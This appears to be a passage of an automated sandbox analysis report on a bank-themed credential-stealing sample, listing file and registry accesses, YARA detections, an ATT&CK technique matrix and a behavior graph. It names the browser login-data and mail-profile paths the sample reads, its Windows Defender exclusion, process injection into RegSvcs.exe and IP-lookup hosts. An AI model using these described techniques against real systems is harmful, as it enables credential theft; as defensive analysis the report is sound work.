            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeQueries volume information: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4521556409.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4521556409.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            11
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            111
            Security Software Discovery
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            Scheduled Task/Job
            11
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop Protocol11
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Obfuscated Files or Information
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Software Packing
            DCSync13
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1620239 Sample: Ziraat Bankasi Swift Mesaji.exe Startdate: 20/02/2025 Architecture: WINDOWS Score: 100 40 reallyfreegeoip.org 2->40 42 checkip.dyndns.org 2->42 44 checkip.dyndns.com 2->44 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Sigma detected: Scheduled temp file as task from temp location 2->54 58 9 other signatures 2->58 8 Ziraat Bankasi Swift Mesaji.exe 7 2->8         started        12 ZnbATfUbUgZW.exe 2->12         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 40->56 process4 file5 34 C:\Users\user\AppData\...\ZnbATfUbUgZW.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\tmpE679.tmp, XML 8->36 dropped 38 C:\...\Ziraat Bankasi Swift Mesaji.exe.log, ASCII 8->38 dropped 60 Adds a directory exclusion to Windows Defender 8->60 14 RegSvcs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        24 2 other processes 8->24 62 Multi AV Scanner detection for dropped file 12->62 22 WerFault.exe 12->22         started        signatures6 process7 dnsIp8 46 checkip.dyndns.com 132.226.247.73, 49704, 49708, 49711 UTMEMUS United States 14->46 48 reallyfreegeoip.org 104.21.16.1, 443, 49705, 49706 CLOUDFLARENETUS United States 14->48 64 Tries to steal Mail credentials (via file / registry access) 14->64 66 Tries to harvest and steal browser information (history, passwords, etc) 14->66 68 Loading BitLocker PowerShell Module 18->68 26 conhost.exe 18->26         started        28 WmiPrvSE.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 24->32         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.